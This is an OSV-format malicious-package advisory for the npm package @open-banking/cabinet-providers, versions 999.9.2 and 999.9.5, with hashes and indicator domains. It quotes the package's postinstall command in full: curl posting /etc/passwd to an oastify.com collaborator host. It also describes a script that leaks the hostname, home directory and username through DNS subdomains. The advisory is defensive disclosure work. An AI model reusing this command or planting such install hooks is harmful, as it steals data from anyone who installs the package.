MAL-2026-5392

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@open-banking/cabinet-providers/MAL-2026-5392.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5392
Published
2026-06-09T16:05:42Z
Modified
2026-06-09T17:16:29.714551913Z
Summary
Malicious code in @open-banking/cabinet-providers (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280)

@open-banking/cabinet-providers@999.9.5 is a dependency-confusion bait package (anomalously high version under a generic scope) that exfiltrates installer data via its postinstall lifecycle script. package.json declares "postinstall": "node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com", which posts the contents of /etc/passwd to a Burp Collaborator (OAST) endpoint, with the installer's hostname prepended to the endpoint as a subdomain. The bundled scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username, splits the result into 50-character chunks joined by "." and fetches http://<chunks>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com over plain HTTP, leaking host identity through DNS-style subdomain encoding. Both behaviors fire automatically on npm install with no user consent.

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-06-09T16:59:44.589998734Z",
            "versions": [
                "999.9.2"
            ],
            "sha256": "1c1de2e003fc91eaf208c2c89119ca1390a5aefc53409c150e2181dd62ae8462",
            "id": "IN-MAL-2026-004960",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T16:06:01Z"
        },
        {
            "modified_time": "2026-06-09T16:05:42Z",
            "versions": [
                "999.9.5"
            ],
            "sha256": "376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280",
            "id": "IN-MAL-2026-004957",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T16:59:44.387454434Z"
        },
        {
            "modified_time": "2026-06-09T16:05:43Z",
            "versions": [
                "999.9.5"
            ],
            "sha256": "3eb304356656c325d4ab5185af3ffd5679fe5c9d2f7be46bc7c47d4bad94b42f",
            "id": "IN-MAL-2026-004958",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T16:59:44.433177866Z"
        },
        {
            "modified_time": "2026-06-09T16:06:01Z",
            "versions": [
                "999.9.2"
            ],
            "sha256": "897ab059e2133dd6c2a8a23dea4e3e39006ca89a2ed3350db82cb9ad063ce408",
            "id": "IN-MAL-2026-004959",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T16:59:44.489953592Z"
        }
    ]
}

Affected packages

npm / @open-banking/cabinet-providers

Package

Name
@open-banking/cabinet-providers
Purl
pkg:npm/%40open-banking%2Fcabinet-providers

Affected ranges

Affected versions

999.*
999.9.2
999.9.5

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "4feadd6cb72ff79d7268326436a7e29148ffa83da3dec74967c7094c5967f43c",
            "tlsh": "c8d09760bc00cb73b9cd05274128b281b8858c471304b82205db82d0c1247b2a8ea90a",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "domains": [
        "7363616e2d303736353937333430343563.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live",
        "2f686f6d652f7363616e.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live",
        "7363616e.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live",
        "73637265616d3367672077617320646f696e67206275672068.756e74696e67.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live",
        "31302e3230302e3134342e32.d8c6tjnqeoph2u2v4bi0npmwqk6eurn6b.oast.live"
    ],
    "package_integrity": [
        {
            "filename": "cabinet-providers-999.9.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-U0fdIncWVRhWDw58c4k+tE40EkCYTba//Vl6JokjkK6ra4G+3+VfXQmm60VY/GE2C1SomLUqJ/Sp02HlAyym2w==",
                "sha1": "ee156078072fcac50fdf46060b026e3c0c250dad"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@open-banking/cabinet-providers/MAL-2026-5392.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]